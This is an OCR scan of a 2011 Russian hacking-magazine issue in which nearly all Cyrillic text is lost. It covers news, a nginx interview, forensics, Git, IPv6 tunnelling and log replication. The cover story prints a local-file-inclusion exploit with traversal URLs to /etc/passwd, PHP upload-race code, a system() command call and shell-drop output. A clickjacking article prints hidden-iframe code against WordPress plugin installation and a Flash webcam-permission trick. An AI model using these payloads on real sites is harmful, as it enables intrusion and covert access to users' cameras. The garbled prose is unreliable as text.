DESCRIPTION
Xakep journal
: ,
- 1Pv6 - '
N'
www.epidemz.net
MEGANEWS SN
-
soNv ~
S 100
PlayStatio N etwok,
. S Music 8500 .
[iJ , , Sony. Sony (, GeoHot ),
, . , ,
, 7 1 PlayStation Netwok, Sony Ente r tai nment Netwo r k Sony Online Entertainment . 60 PSN/SEN SO E. , n , - .
. Sony, 0,1 % . 93 ,
, . , . , Sony ,
. , . :)
AHTBPYCMICROSOFT SECURIY ESSENTIALS
PWS:Wi32/Zbot Google Chome. . , :).
001.
,
.
, 121 .
, , . 9% .
15 ekko. ekko 30 .
WP7 105 ANDROID ((~~
Windows Phone 7
m , iOS Andoid . - - ,
. Apple Google o r a , , , . , . , Microsoftoe
. , Windows Phone 7
, Wi-Fi
, . . Microsoft , , . ,
, WP 7.5.
MEGANEWS GGL I : Ggl Buzz, Google Labs, GoogleCode Search Jaiku.
EDIFIER
Edifier
17 :
2356740 . - - .
Ed ifier AudioCady 2 IMP17) . . , US- F-,
, SD , ! US-). 17 . 2,4 RMSI
, . Ed ifier 17 AUX. ,
F-. 1300 . Edifier 17 .
, IN,S . , GPS . , . 006
MICROSOFT -
Microsoft, , . , Wld, - Rustock. Microsoft- Kelihos ! lu) 42-45 . Kelihos - . , , DDoS-aa,
>> . Microsoft >>. Microsoft ,
. Kelihos 2011 ,
. -, ,
. sikhl--
MEGANEWS , DRM .
? , !
m Vigilant Defende. Vig il ant Defende , - Deus : Human Revolut ion . , , . ,
, ,
. . , , . , 24% ,
, 25% , . , , . -
, , , $30-40 [ , Deus : Hu man Revo lution $60).
, ORM .
WEXLER.BOOK 6002. WEXLER WLR.6002, 6001 . 6.0" PEARL,
. 4 , 50- 36 . , .
- 1500 mAh, WEXLER.BOOK 6002 .
-5 990 .
900
. Deus : Human Revolution
.
.
eBayl ~ , , .
. (20. ,
[NATS).
, . ,
>>. , ,
. , .
. NATS , , . , .
-, .
~ ~ , PAYPALOT
. , . ,
- . PayPal , ,
2,4 3,4% . .
12/155/2011
MEGANEWS FACEBOOK . .
RIW-2011 &,
rn : RIW -. , . ,
ESET, . ,
, Wikileaks.
. , Positive Technologies n , n >> -
. RIW-2011 .
, , RIW 2011 -
- .
, .
- RIW-2011 >> , : . !
71 / - '- 18 / , 8 /- . 010
- RIW2011, :
, , , ,
, , .
7
BUFFALO MINISTATION PLUS
6
n Buffalo's Backup Utility
n n n Windows. , n
Time Machine, n
05 .
Buffalo MiniStation Plus Manage, n -
. n :
.
Buffalo MiniStation
Plus n n 1 . n n n
n , .
TurboPC TurboCopy n
n n n n USB 3.0 n
n n .
nn n AES 256 . n
n n
Secue lockMoile .
USB 3.0
n USB , : , n
n , n n
n . n n :
USB.
RAMDISK RAMDISK - Buffalo
n n -
. ,
,
n n.
n .
MEGANEWS THEWALLSTREET JOURNAL, Photobucket - .
n .
,
.
, , , . , dt R,
. , , , ,
. , .
. , , . , , . ,
, - . , , ,
- Mafia Was :1.
'al:~e ,t!irate :
30 - ,
30- [ ! . an
. , , . Roland OG, ,
30- iMode la $977 [ 3 0- !. ,
, , , , , ,
.
. , , , ,
- . , , , .
NGIX , 27 100 hm .
50 50
nn.
Belgacom Telenet 11 ,
n The P i a te .
RUNA CAPIAL 3 - NGINX,
. n 43
.
LibeOffice
n n Apple iOS Google Android.
~~ ~~ ~~~6I LTE.
1 So,t~~~--o. .. .~~ ........ _
-2d2-- .
~~ . :1
D Chaos Compute Club ICCC) . , ,
->>. , , , ,
. . , , , , . ,
, .
, , , > .
IE 9 - , Microsoft.
92% URL- 8% .
S deurrig .
MEGANEWS 9TOSMAC , IPAD 2 Smat v ..
SPYEYE
~ SpyEye ... -.. - -- __ .... --
-...... .......---
1 - .... ... - 1
SpyEye SS ,
n .
Tustee , SpyEye . ,
: SMS , - . it-
, - ,
, . , - , , . : SpyEye
. , , .
, , . ,
, 51 -.
, ,
.
GS-
. . ,
"( - v 5/- .
HAKOMbTECb-DART GGL
,
- Dat ldatlag . g].
DART , , -
. JavaScipt. , D a t JavaScipt,
. , , BSD. Dat . , .
, Web lspecto Dat -. ,
Dat , - ,
. , Dat JavaScipt.
Dat Dat . Google
Dat Chome , , Google Chome 05.
: , .
, .
, . . Dat- , ,
. .
, D at - Google. 2006 Google We b Toolkit,
- Java . , , Adwods Google Wave . Google Web Toolkit .
Dat, Google ...
Dat , , . Dat
EUROPEAN SECURITYTEAM 6, , , %.
CHROME
Jt su ('rn)
GOOGLE ,
, Google , . , , Chome. , Chome Remote Desktop, -.
Windows, 05 Linux, hm-. Chome Remote Desktop - Chome. ! - , , . lno
! . - , .
Google , - ,
, . , Google Chome , -.
WebRTC IReal Time Communicationsl, - . Google , WebRTC
- , -
Chrome >
()! nn, ICOII.tepy oroporo r I'IOAIQ'IO&cn.c, IGtO{J(V '. ocryn kOt.O>IOepy' n ' OCJ'YIW.
n
n Chrome '
[1). r n n w, nepealle f Q.....-..
4615 2551 7896
n r .
. ,
. , WR Mozilla. , Goog le Mozilla , .
, Google mViw
, WebRTC. Google , Chome.
, WebRTC , : iSAC iLBC
, - Google V8 . chomium . og ,
2- libjingle, UDP Google.
PseudoTcp- libjingle, . SSL-. potobuf IPotocol Buffesl.
PARKER INGENUITY
,
PARKER 5 TECHNOLOGY PARKER , .
k STH Techology , , .
, , , .
,
. k
lgeu ity k STH Technology; ,
. k lnguit :
, . ,
,
.
HEADER
,
? ,~ , . . - -, Loggly, Spluk
- . . ,
, syslog/syslog-ng, . ,
-, n. -. -, . -,
. , , : - - >>. standaloe-aao Loggly, , Gaylog [www. gaylog2.og/about l,
, MongoBD
. , - Logeplica [ dklab.u/
li/dklab logeplica l. , .
? : Log eplica SSH , . , , , , , . -
. . n : syslog/syslog-ng?, Logeplica
. , n - .
? , - [ ].
-, . , [n ssh-keygen -t sal ,
[ssh-copy-id ootramachine-to-be-pulled]. Logeplica
[/etc/dklab_logeplica . conf], , - , :
destination = /var/log/cluster
skip_destination_prefixes = /var/log:/var/lib/pgsql/data/logs
scoreboard = /var/run/dklab_logreplica.scoreboard
delay = 0.25
user = root

[files]
/var/log/{messages,maillog}
/var/log/httpd/*_log

[hosts]
first=machine1.example.com
. - dklab_logeplica. init /etc/init .d
. /etc/init.d/dklab_logeplica stat>>, logeplica .
? , >> [ www.denwe.u l, [ logeplica
l]. :::
[Screenshot: dklab_logreplica.pl source code on GitHub]
# hacker tweets ~~ rajmj:
Facebook, . .
@DidierStevens: free(pDennisRitchie); pDennisRitchie = NULL; // :-(
El : - . , , Lisp .
raox6D6172696F: . - >.
it.ly/ l bsue . : , , Chome,
la Google). coss-oigin policy!
, , , ;).
$5000
: -
El : . , , .
, : > .
... #nomoefeebugs
raFishermansEnemy: CISSP,
Metasploit.
rastackSmashing: -2147483647
l ntege.
: live. xakep.u/biog/Hack/2147.html .
El : . , w- . ,
.
rastamparm: Google "'
HEADER
Proof-of-Concept
, . , .
- .
, , t [tcpcypt.og ],
.
? . t . ,
>>: . - ,
. t .
, .
. t,
, , .
t?
? (github.com/ sobo/tcpcypt ) , . ,
(Windows, 05 , Linux, FeeBSD) .
: (4500 ) uselandeoa (7000 LoC).
n
, netsf. i f . , , t .
ni- : ,
70000 60000
.!!! 50000 "' 40000 fj Q) 30000
Generate random master key 20000 ~~~~~~
client server
() 10000
serve
n . .
? 79% t :).
, n.
(lntenet Daft) , , ( n : Ql.L ly/tyvGxs). ,
,
? ( n , NAT), , . ,
t - ( VPN-cepepa).
, ( 36 SSL) .
, .
- t? ,
I- . :::
19,153
tcpcrypt server
737 SSL
server
tcpcrypt : - ,
SSL 82 . tcpcrypt !
! IGROUP i GROUP-IB,
, no . GROUP-IB.
Group-18 ,
. , .
Group-IB
n ! 2 2011 - >> I)
_ _ , ' . -k USB Flash _ ' , . dd l ) w . - ' ' , -
' .
n: ?
' ? ? - ?
LINUX n :
: :
000 >> 3 2011
: 6n -3 2011 l -
>> 000 " , -- > - ynp L ux
' 1 i\ n - .
n . - n -
1 . n n ?
? ' n 2. .. ~
oil ... ? n
w ovo
.
n n . n n n .
n n contestlagroup- ib.ru n >>
n .
! !
COVERSTORY , , Group-18
1
, ! , DDoS,
, ...
- . ,
. ,
.
, , ,
.
,
, , ,
.
, ,
. !) . ,
,
,
.
,
, ,
. . 11
, . , : , . ,
, , .
2) , ,
.
. l
. , DLP . DL- . .
4) ,
-. ,
.
. ,
, , . 11 ,
, , :
, .
.
.
, , ! , IPS, DLPI. ,
Caine- Computer Aided INvestigative Environment
. -, .
,
.
.
21 , , , : , , , ,
, .
,
. ,
. - .
Linux:
Caine [http:Uwww.caine-live.net/l, Riplinux [ http:Uip. 7.de/cuent/l .
, CD\DVD US-, .
~
1
,
.
2
, ,
~
.
3 ,
.
:
I- 8.8.8.8, 000
COVERSTORY , n , Group-IB
, ; [, ]; , . : ,
. ., 12345.
[], DVD, US-, SDHC. Seagate, 3750330NS, 1 23.
\Uss\\Dumnts\ NQ1 NQB n .tt>>.
n n Q\P 2010, 6221, n
, nn n n > n n .
, :
n [, , ] ; [, ]; n ;
n n, .
compiled options:
!
: ,
653 . MicoSDHC, n Tanscend, 16 ,
1234 567. n -
lntenet l n .
command line: dc3dd if=/dev/sda of=/mnt/image.dd
device size: 41943040 sectors (probed)
sector size: 512 bytes (probed)
875462656 bytes (835 M) copied (4%), 4.53218 s, 184 M/s
[!!] writing to `/mnt/image.dd': No space left on device
886243328 bytes (845 M) copied (4%), 4.63351 s, 182 M/s

input results for device `/dev/sda':
   1730944 sectors in
   0 bad sectors replaced by zeros

output results for file `/mnt/image.dd':
   1730152 sectors out

dc3dd failed at 2011-10-19 12:56:41 +0000

# dc3dd if=/dev/sda of=/mnt/image.dd

dc3dd 7.0.0 started at 2011-10-19 12:57:06 +0
compiled options:
command line: dc3dd if=/dev/sda of=/mnt/image.dd
device size: 41943040 sectors (probed)
sector size: 512 bytes (probed)
1179648 bytes (1.1 M) copied (0%), 1.01073 s, 1.1 M/s
n RIP Linux
, : n \COMP1\HDD1\IE US - , n
ADATA, 1234.
, : n
n n n n ;
n n, -, - . n n;
, , .
, n n n.
[, -n], n n n n, n n , n n n . , n .
:
, :
n , DL , n
. DLP, ,
n n. . n n
. n , , . ,
, , .
: DDOS
, :
, - - > .
-. -,
. - (], ,
.
, 5-1 . .
, .
. . , , .
,
, , : ], .
, : 1)
. 2)
. )
, .:::!:
SONY , ,
"' AccessData .Eie '[re1v .d !:!\>
[Screenshot: AccessData FTK Imager: evidence tree of an NTFS volume, NTFS access control entry properties, and a file list]
, :
.
, ,
, ,
( ] .
.
lc ],
, .
, , , .
COVER STORY
& 1994 .
' . 2000
, 11 .
2002 ~l web-cep~ep QI ,
45 .
.
2011 $~: Ngix i . . .
~ n .
NGINX
gi
n , , 1.:;.1 ,
?
&l ~ . ,
[ ] -, 18 . 1987
, , -,
. , - .
>> , ,
, . : , Yamaha ! MSX]. , , 1. , - .
n ~ 1.:;.1 ,
?
&l ~ - AV>>,
1989-1990 . , - 100 . ,
, : , >>, >> ,
. , - . , . : , . -
, 1992- , .
1994 ,
, .
7 , 2000 .
NASDAQ, ,
.
- XXL.RU, ,
, 13 2000
.
COVERSTORY
r.1 .... ?
l . ~
: , ,
, , ,- Apache. , mod_gzip
, mod_deflate, Apache 1.3.
mod_poxy. ,
, - .
mod_accel- Apache . 2001 .
r.1 .... ,
?
l , . Mod_defl~te _ ~ ,
, . , , , . 2001
-, Apache. ,
, . -
, , , , , .
Apache- , . :
Apache , . gi Apache . , , nginx .
Apache: ,
, . , - , . - , , : nginx n . ,
- 2002 nginx.
r.1 ....
? ?
l 2003 npo n ~ , , , nginx
n .
Rate.ee, . , , . nginx mamba.u zvuki.u, 3.
2004 ft . m.u, , ,
nginx ,
. , , ,
, , . , , . - 2004 , ft.m.u ginx.
4 2004 , ,
: 0.1.0.
r.1 NGINX .... ,
?
l ~ .
. ngix . nginx , . , , nginx,
, ,
. ,
. .
r.1 , .... , ,
?
l - ~ . ,
- . , ginx n >>,
, ,
. nginx, , . -,
n , , -, .
r.1 ~, LIGHPD .... , .
l n: ~
-, n nginx . nginx
. ,
nginx
nginx. , nginx -.
lighttpd (lighty]. - , nginx,
. - (Jan Kneschke]. , - , , .
, , . , lighttpd FastCGI. 2000-2001 , , Apache: , l, Python.
lighttpd - , FastCGI . lighttpd FastCGI . 2000 : .
r.1 ... NGINX ?
l ~ . ~ - . ng1nx
- - no FastCGI WSGI. Apache-
, nginx ,
n FastCGI. , , nginx, Apache. : nginx
, .
, ?
1 , , ~ Apache nginx? ,
, . Apache ,
- , , mod_php. , 100 , , , 100 .
: 1 , , - . 100 , , / (10 /].
, 1 . ,
, Apache 10-20 .
, , Apache , , . , . i gi Apache, :
gi , Apache, , . gi , --
, , l
Apache, .- . .).
- , , gi
- gi ,
.
.
1 , - ~ ,
, - . Apache, gi - !- . ,
COVER STORY
r.1 : ~ NGINX.
? . ?
l , n. , ~ , ,
n . , n n , .
, : n .
, , n n n BSD,
n . nginx , . , nginx
, Rate.ee zvuki.u.
r,1 ~ NGINX? l - ~ ,
. , .
, , ,
, . .
Linu-: CentOS, Ubuntu.
, , . :
- , , , .
?
l - . ~
ng1nx - ngix,
. , , , -, .
.
gi.
- (Netcaft, 2011): 64.67%"'"'
keep-alive .
@ 15.660/ -0.07% ,
Ngix
.
8.54/ +o.s1%
gi
-. 100 000 000 000 000
2002 2004
2011 gi $3
: .
gi
87 912 .
.
2011 1.0 gi
70+ .
gi hiig!
Rate.ee - ,
gi.
8 gi
security advisoies.
3 gi
.
.
.
- gi
43 000 000
gi :
"' Ram 1!111 II.I!M
ulu .: ~WORDPRESS @
t. ic Dropox
:
.......
SOU!IS
COVER STORY
!r!AOE IN Cfi!
i
R_T_T
,
- -
. , . ,
, ,
.
,
D ltel ( 2007 ]
,
S-. , , ,
1. AMD
,
. ,
, . ,
. , ,
, ,
.
. ....:=--------------cvn . . ..
~IA/)~
COVERSTORY
86. ,
,
. .
, - , , - .
, , - .
, . ,
, [ l - .
, , , - . , ,
, ltel
, ...
: , , -
, , lntel. , - ? : Assemed Canada, - Assemied China.
, -
VII\OJI
'1.0 s.
-----
2. lntel
, , n . , , , ,
. n
: n ,
. , >>, >>,
>>, , .
, lntel . ,
5000, . , 631xESB/632xESB 1/0 Contolle Hub,
- , 2007
. , . ,
-: ,
,
. [BMCI -
. , - ,
~11"-.~ /3 ""PT'j . ..w 3 .~ ~i
, lntel .
,
. .
: lntel 5000 ,
- ,
. - lntel , ,
.
- , - , , ,
, ,
.
>> - lntel,
, >>. , .
,
COVERSTORY
, . . , . , -
. , ,
. , : , .
, .
, ltel .
, , 7, 11- ,
! -
!. , 11
, V- .
, .
11- , , , .
, , -
. , , , 11- . , !
, - ,
, . , . , ,
, - .
- - ,
, . , .
, ,
ltel, , ,
, . - .
, . , , .
-, .
, .
. ,
------------------ -------------------
, , .
, .
US-, ,
, . l. 31.
, ,- , .
-
!. . 41. - , ltel, , .
. ltel. ,
.
, .
, .
, , ,
,
. , ,
, .
, , ,
. , , . .
. . ,
, .
,
, , , , .
, , , ,
. ,
, . , , .
, . - ,
- , . , , ,
, ,
. , - , ,
-? , ?
, , . , .
, [ ,
). , , , , . 86, , ,
. , ,
, . , ,
. .
, : . - ,
. -, -,
,
.
COVERSTORY poma lpomawkelagmail .co,;,l
I LFI
phpinfo[) . .
LFI-ATAKY
phpifoll 10% .
J!hi!,.ng! - ; bjt i/q LFI; bjy/ccFHcYphpinfoll ; it.ly/omkMVP LFI phpinfoll
RDot; it.ly/YP9LE BWMeter; bjy/eS4GxW Procmon.
. ,
, .
PERL ,
.
, , local lile i clude, ,
. . , . , , .
LFI, .
. -: , - local lile inclusion ... php.ini - , ? , - , ! LFI -aa ,
, - n.
LFI: 1. [, , . .l.
[ , !.
2. 1/apache/logs/eo.log, /va/log/access_log, // self/envion, /poc/self/cmdline, /poc/sell/ld/X !.
, , . n CG I
/ , .
3. nn [data:, php://input, php://fi l te l, allow_ul_include=On [n-0111 >= 5.2.
4. 1/tmp/sess_*./va/li/php/session/1. , .
5. . S n www-, [ ./v/sl/ maill .
tm-
, LFI (/tmp/php*, C:\tmp\php*l . / :
LFI-; phpinfo(l; - n Windows (
!; > 5.2.0.
n ( , - , !: 1. - h-n phpinfo[J,
(tmpl . 2. phpinfo[J
seed ! ! . .
(, Content-Lengthl, L
4. tm- LFI.
. . , :
http://site.com/css.php?file=style.css
http://site.com/css.php?file=../../(...)/etc/passwd
, css.php:
n , , n , . *nix Windows:
http://site.com/css.php?file=../../../../../etc/passwd
http://site.com/css.php?file=../../../../../tmp/
http://site.com/css.php?file=../../../../..\Windows\Temp\
phpinfo
- tm -
PHPINFO() n n phpinfo[J. n
, n php.ini , n .
n : 1. upload_tmp_di-peea ,
. (NULLI, Envionment.EMP.
2. file_uploads-a n upload_tmp_di ! n n Onl. . upload_max_filesize-aca .
( 10 l, n 2 .
4. max_execution_time-acaoe n . , , n , n . :-1
5. session.seialize_handle-cepaaop . -h ( !.
, phpinfo[J n , n Vesion 5.3.8.
$_FILES n n ( RFC1867I: 1. . 2. n - .
. tm- n . 4. . 6. - . 7. nn -. 8. l nu ( ! . 9. - n , .
3, 4, 5, 6, 7 tm- , n 8 . -n $_FILES, n nn
move_uploaded_file[J. , n
n, , . n,
, cleanup. , ,
, , n . , -n ( _* ob_stat, ob_flush !, , n 8 9,
n . n
COVER STORY
DOS LFI + PHPINFO[] _FILES, , . . , - ?
? . . ,
30 , , . ,
. ( + ) .
. , . . S-- file_upload php.ini.
, . phpinfo(],
tm- , , LFI , cleaup . ,
, . , ?
, LFI , . >- , . , . , , . , . :1 :
Cotet-Legth [ );
[, ------------BWvJ N Ml.
, : 1. . 2. [ ). 3. ,
.
2 , . , , , , ,
.
,
. phpinfo[l .
[phpifo.php, info.php, i.php . .), G elwaux [ ). , . . Vaiaes phpifo[)
PHPINFO[]
n - phpinfo(l , .
, .
, n n , phpinfoll: 1. , / , ; 2. dumnt_t-,
; 3. _lg - [ LFI); 4. safe_mode [default OFF)- ; 5. open_basedi [default mt)- ,
; 6. allow_ul_fope [default ON)- URL
; 7. allow_ul_include [default OFF) - ;
. magic_quotes_gpc [default OFF) - ;
9. egiste_globals [default OFF)- ; 10. disae_functions [default empty) -
; 11. max_execution_time [default 0)-
; 12. display_eos [default OFF) - ; 13. upload_tmp_di-y tm-. 14. [cul, sockets, zip . .); 15. : _G ET, _POST, _COOKI E,
FILES, _SERVER.
: _GET, _POST _FILES. [
phpinfo
[Screenshot: Administrator: C:\Windows\System32\cmd.exe]
\ .TMP
= C:\Windows\Temp ( upload_tmp_dir php.ini), = php (sessio.ser.ialize_handler), = .
, Windows , :
phplAE.tmp phplAF.tmp php;t.A4~.tmp
*nix mkstemp [linux.die.net/man/3/mkstemp):
/ = / tmp,_ = php (session.seria1ize_handler), =. (seed += PID). . glibc
:
- t_ime () - gettimeofday().sec
COVER STORY
, . , , ,
-. , phpifoll , .
1000000*36 , .
. , Micosoft-IIS/7. 5 /5.3.8 .
Widows-cepepa css.php LFI:
phpinfo.php:
, tm-:
- S- - :
// Evil $file="-----------------------------XaXbXaXbXaXbXa\r\n" ; $file .="Content-Disposition: form-data; name=file" .rand(e, 100)." ; filename=\r\nfile" . rand(e, 100). ". txt\r\n" ; $file.= "Content-Type: text/plain\r\n\r\n" ; $file.= "\r\n" ; $fi:J,e.="------------------------ - ----XaXbXaXbXaXbXa\r\n" ; $post = $file; $req ="POST " .$target. " /1.8\r\ " ; $req.= "Host: " .$host. "\r\n" ; $req.= "Content-Type: multipart/form-data;
boundary=---------------------------XaXbXaXbXaXbXa\r\n"~ $req. ="Content-Length: _" . strlen($post). "\r\n" ; $req.= "Connection: Close\r\n\r\n" ; $req.= $post;
:
$tmp = '' ; $html = '' ; $sock = socket_create(AF_INET, SOCK_STREA, SOL_TCP); socket_connect($sock, $host, ); socket_write($sock, $req); while ($out = socket_read($sock, 65536 )) {
$html .= $out; if(preg_match_all( '#=> (. *)#' ,$html,$r) &&
! empty($r[e][ 2])) {
$tmp = str _replace( array ( "=> " , ' ' ), $r[e]( 2]); }
socket_close($sock);
$html phpifo, $tmp- tm-. :
$tmp_hex = $tmp; if(strpos($tmp_hex, ': ' )) {
$path = explode( ' : ' ,$tmp_hex); $tmp_hex = $path[1]; } $tmp_hex = ($tmp_hex &&
preg_match(' #php(. *)\. tmp#' ,$tmp_hex,$rd)) ? $rd[1] : '' ;
$tmp_hex seed . - . . Content-Length ! , ! :
$req = substr($req,e,strlen($req)-2); retname($host,$req);
n . , n .
$tmp_hex +1 LFI. ? , . , , , - , .
. +2, +3 . . , ,
, tm-, 1 100.
LFI . -:
ttp://site.com/css.php?file= .. / .. / .. /tmp/ php7xEkH&e=system( 'dir')
:
php expl.php step4 .. / .. / .. /tmp/php7xEkH.tmp http://site.com/s.txt
here your shell : http://site.com/8149. php
expl.php- , .
, phpinfoll . , Live, magic_quotes=o ./supe . Windows-aax , i*- BWMete . ,
- - . , . ::
Preview PCZONE
IPV6:HOWTO 50 ~ 1Pv4 .
. 1Pv6! , . I . ~
, . .
/ ? NAT 1v4-.
1Pv6,
PCZONE
5 , ves i on1, ve sion2, ve sion2a,
. ,
. , hello wold ,
. 15 ,
, - Git !
GIT? Git- ,
, Linux. : n , n n n . Git'a n .
: Git , .
, , , - . , , , , , , IDE. -
. .
Git
, , , . Linux git . ' , , n - git-osx-installe. Windows
, ) - ). Git
Windows, , , . Git . GitG Git, IDE git, , ,
. Git . commit. n. commit , ) ). n
:
git config --global user.name "Your Name"
git config --global user.email "your@email.com"
, :
git config --global color.diff auto
git config --global color.status auto
git config --global color.branch auto
commit
n commit'a:
git commit -m "initial commit"
- > - staging commit . Git staging
. :
git commit -am 'update to index.php'
git status . . commit, ,
. , , . , ,
>, - , - .
git branch 1 git checkout n , . : n , ,
. , , . Git ,
. banch,
, , .
git branch
PCZONE
[Screenshot: GitHub commit view showing a change to src/support.js in the jQuery repository]
, banch , :
git branch experimentalBrunch
, n Git l - mst- l.
, . open souce>> , Sign Up>> . ,
n SS-. , -, ! u) Gitu-. Puic Keys>> Add anothe puiic key>>. .
n SSH , . , , . , . - l help . github . com/woking-withkey-pass-phases ) .
git clone Git , GitHub- .
, - , l, , - , ). GitHub . jQuey. Gitu-, clone URL>>. URL , l Git-
) n, clone:
git clone git://github.com/jquery/jquery.git
Git jquery . , - n gitk -all>>.
git push .
git, . ' GitHub
I), . , -
. GitHub puiic clone URL>> , , pesonal clone URL>> . GitHub .
git remote add origin git@github.com:aburgess/My-First-GitHub-Repo.git
git push origin master
. oigi pivate clone URL>>. - git-push- maste oigin l. . GitHu.
, . Gitu- .
git pull push' , git pull , . : git fetch ! ) get mege l ):
git fetch upstream master
git merge upstream/master
Git&GitHub:
mitsuhiko (Armin Ronacher)
lm.ti~ICI>ve-
PCZONE
CLICKJACKING: , , , : , ? ,
. ,
, -
.
.
, -
- .
: www.sectheory. com/clickjackjnq.htm: www.contextis. com/resources/ white-papers/click-klna;
~ com/201 0/paoers/ J!Z1J!!!f; www.owasp.org/ index.pho/Cijckjack ing.
. n.
CLICKJACKING? ,
. click jackig , - >> . , , ! ?
L- , : -
; L- ,
; L- ,
z - i d ex .
, L- ! ,
, iframe, , . iframe
- , .
, , iframe, SS- opaci ty
[Screenshot: a Facebook page with a fake "Security Check" that asks the visitor to click numbered buttons in a given order]
z-idex. , , . , , , .
(55-- .
? clickjacking-apyo.
, , :
chtml> chl style= "text-alig:ceter" >owo yw style=" fot-size: 38;" >! r> !/> cdiv style= "z-idex:le; opacity:e; positio:absolute; top:epx; " > ciframe scrolling="no" style= "width:eepx; height:seepx;"
src= "http://www .g.com/search?q=buy+kidle+amazo" > ! - - iframe -->
href= "#" >Ka ?/>
, Bing'a.
. , - . , , , Retwit Like,
, . , .
HIXOIICA n
r
ni -i l'tOI'IHOCO lframe
anK corn
" ns.
100 200
.nn , :s n Next.
i.
, , - - ?
, -, . , , -,
- WodPess . , . - WodPess'o, ,
. , lnstall Now [, , Fiefox). . http://wordpress/wp-admin/
plugin-install.php?tab=plugin-informatio&plugin=wp-galleryremote, plugi
. , ifame
lnstall Now. - . , , [ ). . , [ zi-)
URL: http://wordpress/wp-content/plugins/.
. , ? - . -
. , 51idePress, 55- . , .
[ n ) [secuity-assessment.com ). WordPess 3.1.3 2011 .
[- l), clickjacking-aa. .
PCZONE
(i! 11@) C:\Usrs\ ondrew\ 0 ~ C:\Usrs\ ondrew\ Dosktop\s ... L ..J WordPress.org Login Page In Frame
This content cannot displayed in frame help protect the se
- . .
function refreshSettings(timeout) {
    // Re-create the Settings Manager iframe after the given delay
    window.setTimeout(function () {
        $('#settings').empty().append($('<iframe allowtransparency="true" src="https://www.macromedia.com/support/flashplayer/sys/settingsmanager2.swf?defaultTab=privacy">'));
        setSettingsVisibility();
    }, timeout);
}
Adobe JavaScipt-o, ifame. SWF-
- . , , ? : ) (www. fe oss.og/webcam -spy), ',
' Fiefox Safai, GitHub (github.com/ feoss/we bcam - spy). ,
z-index opacity SWF-, ifame. , ,
Adobe . . ( ), -
[Screenshot: Adobe Flash Player Settings Manager, Website Privacy Settings panel]
Wied Gizmodo , Flash .
? , , , SQLi , , XSS.
(, , ). , . , clickjacking'a
- ( ), . FieFox NoScipt
( addons . moz ill a . og /r u /fire fox/addon/nosc r ipt ) . ClearCiick
, . , . I
White Hat Secur1ties i :: . - t . .
' +
-----
-----
-----
The hidden lframe contains : http/lwordpresslwp-adminlplug!n-tnstall.php?tab-plug!n-lnformatlon&r iframe=te&wjd-640&hejght-58l
Author: Chnian 8e1rtr!s
#outerdiv { width: 1 ; height:Opx; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:O;}
Last Updated: 1135 deys ogo Requlres WordPress Verslon: 2.5 or higher
#inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height :1 00px; border: n ;}
- WordPress
PCWNE
IPV6-APEC ? , ,
: 1v4- . ? ? ? .
,
1v4- 1Pv6. :
. 1Pv6
, .
Windows
1Pv6: jpv6-test.com/ speedtest
, 1Pv6: bjt.ly/rHoc4B SixXS : bjt.ly/vOIOAC
~ ~Torrent Windows [{)
! ~;t) ~ n n !v/ eredo
uTorret Teredo
'-' ? 128- [2001 :5c0:1400:a::68dl 32- [65.148.151.1241- 1v6-. : 1v6- , . , ,
1v4- . , 1Pv6,- I-, NAT . ,
. . 1. ,
NAT. NAT, 1v4- . , [ii- , [!
. NAT : , , . iCQ,
I-, . [ !, 1Pv6 . , , , 1Pv4 1v6 [
1Pv6 ! . , 1Pv6. , , , 1v6-
. 1Pv6 , [ 1Pv4-apecal .
[Screenshot: gogoCLIENT settings: server address anonymous.freenet.net, with a choice between connecting anonymously and connecting with credentials]
2. 1v6 -. , - (, Bitoentl, 1Pv6
, . ,
. . IP UOP, UOP 1Pv6, 1v6- U-, . , , >> 1v6- 1Pv4 ( , UOPv41.
, . 1Pv6-to-1Pv4?
, 1Pv6 Uv4-: , ,
. 3. .
, - . , tnt-, N', ,
I- ( !. 1v6-, . , , N', -
I- ( 1Pv6, ! . tnt 1Pv6: uToent, Azueus, ansmission. 1 Pv6 ( ! , , . s6,
, 18 (16-, 2-nopl .
1Pv6:
[Screenshot: gogoCLIENT connection status: tunnel mode IPv6-in-UDP-IPv4 (NAT Traversal), server anon-amsterdam.freenet.net]
N' . gogoCLIENT NAT Tavesal,
[Screenshot: IPv6 connectivity test page reporting a native global unicast IPv6 address (gogo6 Inc.) alongside the IPv4 address]
1Pv6- IPv~-apeca. ,
, 1v6- , . , thepiatebay.og ipv6 .n nm-club . u - n .
4. . n
( > , ! . , , > :1.
. .
, 1v6- .
, - 1Pv6? , , , - 1v6- . , - ,
, - , ( , > ], , - , . n , - , 1Pv4. , , 1v6-, ,
, - . . .
, .
1v6-, . . 1Pv6 ( ] ,
. NAT, 1v4- , , n ,
. 1Pv6. .
PCZONE
Gogonet/Freenet6 gogonet.gogo6.com
n , n , NAT. GUI-
, n/56-n . 1Pv6, , , . .
Hurricane Electric 1Pv6 http :Uwww. tu n ne 1 ker. n et
, /48-n 1v6- . , no
[, , , , , , ! , , . ,
, IP.
SixXS www.sixxs.net
I-, , n , 1Pv6. [ ! 40 . : n [ Linkedlnl, . > [ it . ly/snYfdm l.
6to4 1v4-, 6to4- 1Pv6.
, . 6t4- 1v6-, 6t4-,
1v4-, 1v6-. 6t4- 1v6-,
anycast-apecy 192.88.99.1. , 6to4, 1v6- 1v6-. , .
6t4- , - 1v4-, , , 192.88. 99.1. . 6to4 , 6to4
, , , . - ,
. . I-, 1Pv6. 6to4 n . , ,
, , 200 .
Teredo , I-, NAT. 6to4 - -
0 n 1Pv4 , , 62.148.151.123
n 1Pv6 , , 2001:5c0:1400:a::68d , 1Pv6 n: freenet6 t ! r 8-ro ~ 2011 . ~
& I-
93.100.186.155.pool.sknt.ru [uTP] 178.255.14835
200 :2000 :4008:3 :224 : 7 eff:fE01: 84 2001:250:1401:3120:59d1:58a:801d:c095
m 94-192 -124-184.zone.bethere.co.uk
1v6- -
: , , 1Pv6 UDPv4 . ! , ) gogo6/ Feenet6 lgogonet .gogo6.com ), .
, , , 1Pv6, n,
1Pv6:
% 1J orrent 2.2 DHP 100.0 703.8 kB/ s libTorrent 0.12.6 D 100.0 3613 kB/ s Bit ornado/031 D 100.0 78.8 kB/ s 1-1 orrent 1.8.5 UD 45.7 12.0 kB/ s
Bit orrent SDK 2.0 D 100.0 0.7 kB/ s
. feenet6, gogo6, n. : 1Pv6-in-1Pv4 l
, IP), 1Pv6-in-1Pv4 NAT vsli 1Pv6-in-UDP-is- 1Pv4),
, IP, 1Pv4-i-1Pv6la , 1v4-, 1v6-). n n TSP ITue l Setup Potocol) . , n .
